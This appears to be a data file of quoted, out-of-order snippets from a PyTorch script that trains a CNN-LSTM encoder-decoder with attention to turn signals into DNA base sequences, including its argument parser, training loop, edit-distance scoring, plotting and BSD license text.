"torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder =",
"\\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead",
"tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) #",
"i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None:",
"\"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0",
"element in the batch if i == max_in_batch: break # when seq length",
"x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len),",
"1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy,",
"loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val],",
"writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit",
"in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len):",
"b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden",
"default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float,",
"forcing, use actual next token as next input #if not, use predicted token",
"= 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates =",
"2. Redistributions in binary form must reproduce the above copyright notice, this list",
"parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4))",
"read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname))",
"= num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention",
"INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT",
"decoder must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and",
"= Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length",
"seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() #",
"nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True,",
"encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result =",
"number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder",
"i < true_y_len # get indices of not padded sequences true_y_len = true_y_len[not_padded_batches]",
"const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float,",
"# when seq length (i) >= true seq length if i >= true_y_len[-1].item()",
"lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM",
"THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as np import",
"= torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2,",
"= end def __eq__(self, other): return self.start <= other <= self.end def make_argparser():",
"regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8)",
"documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY",
"batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu()))",
"updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True):",
"F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate",
"n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end =",
"= running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses)",
"os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" + infile print(file_out) with",
"# put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled",
"= hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :, i]",
"NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR",
"size, out dim] return outputs, hidden # Sequence to sequence model # -----------",
"hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class",
"{} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {}",
"must retain the above copyright notice, this list of conditions and the following",
"signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5]))",
"np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates",
"script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data =",
"batch if i == max_in_batch: break # when seq length (i) >= true",
"batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset",
"n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True,",
"the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright",
"class Range(object): def __init__(self, start, end): self.start = start self.end = end def",
"have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must",
"updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates]",
"bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads,",
"val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \",",
"= model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0,",
"datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader)",
"float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] =",
"cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start:",
"= 0 num_chars = 0 for idx, length in enumerate(target_lengths): length = int(length.item())",
"editd += result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer,",
"= np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1,",
"data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\",",
"= time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\"",
"default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM",
"forms, with or without modification, are permitted provided that the following conditions are",
"help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int,",
"for idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p,",
"time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages",
"= self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate =",
"list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\")",
"'{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname))",
"forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11 start = time.time()",
"Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"11 start = time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion,",
"shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the",
"= None heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing =",
"c) + (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy",
"10 reads, kernel size = 11 start = time.time() out12 = trainNet( model12,",
"file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1,",
"+= acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val,",
"Network # ----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder #",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in",
"= args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01",
"loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train",
"end): self.start = start self.end = end def __eq__(self, other): return self.start <=",
"param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\"",
"val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val]",
"= bidirectional self.port = port self.dropout=dropout # Define the LSTM layer self.lstm =",
"if i == max_in_batch: break # when seq length (i) >= true seq",
"editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__ ==",
"path to the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder",
"updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] =",
"= fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()),",
"if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name",
"* F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy",
"editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\")",
"parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\",",
"encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel",
"parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11,",
"= nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias)",
"= 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss =",
"data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4]",
"parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)),",
"first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder,",
"val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) /",
"read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set",
"[batch size, out dim] return outputs, hidden # Sequence to sequence model #",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0,",
"seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x",
"Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__()",
"def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### #####",
"label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i +=",
"matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases",
"= (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The",
"= nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear =",
"# Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing if",
"running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val",
"for LSTM seq_length x out_size # Calculate cross entropy loss # output =",
"0 num_chars = 0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq",
"nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port",
"of source code must retain the above copyright notice, this list of conditions",
"1)))) if updates % make_validation == 0: print(\"=\" * 30) print(\"batch {} in",
"on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val],",
"output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__()",
"LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout)",
"forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4",
"np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses),",
"# epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance=",
"type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int,",
"acc_iteration.append(acc) #if editD: # if updates % make_validation == 0: # ed =",
"plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig =",
"idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length:",
"input for LSTM seq_length x out_size # Calculate cross entropy loss # output",
"criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping,",
"type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?',",
"= ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result",
")) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path +",
"vs. updates from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0,",
"p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if",
"\"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__",
"be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the",
"= hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original =",
"loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings",
"LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False,",
"(batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden",
"= i < true_y_len # get indices of not padded sequences true_y_len =",
"length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 =",
"running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss:",
"(hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x",
"len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] #",
"sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort",
"input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax",
"teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher",
"float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\"",
"sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10)",
"Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf",
"[batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden:",
"= 1 # one hot encode input input_decoder = label if teacher_force else",
"for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in",
"= args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type",
"input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a,",
"+= loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc +=",
"False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load",
"decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :]",
"plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE",
"PdfPages import math import torch.optim as optim from torch.utils.data import Dataset, DataLoader from",
"gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\")",
"(seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output =",
"return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param",
"Forward pass through LSTM layer # shape of lstm_in: [batch, input_dim] # shape",
"= original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long())",
"lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias",
"= dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim",
"= data[4] #Wrap them in a Variable object inputs, labels, labels10 = Variable(batch_x,",
"# Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val",
"WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS",
"matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim",
"tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size,",
"+= ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer =",
"args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob",
"\"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2,",
"param.size(0) # forget gate start, end = n//4, n//2 # ordering ingate, forgetgate,",
"# teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0),",
"clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25,",
"split_LSTMbiases and \"bias\" in p and \"lstm\" in p and \"linear\" not in",
"f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={},",
"own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim =",
"y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer # shape of",
"float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates)",
"hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x,",
"lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def forward(self,",
"next input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1]",
"edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation",
"train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True,",
"accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if",
"float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we have reached half",
"in name and \"linear\" not in name: for b in [\"input\", \"forget\", \"cell\",",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings",
"# remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm",
"label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False,",
"a and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 =",
"mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)",
"ed # else: # ed = 0 # ed2 = old_ed # #",
"if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train",
"0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input",
"(256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx]",
"cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class",
"on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train))",
"updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation",
"> 2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11) m =",
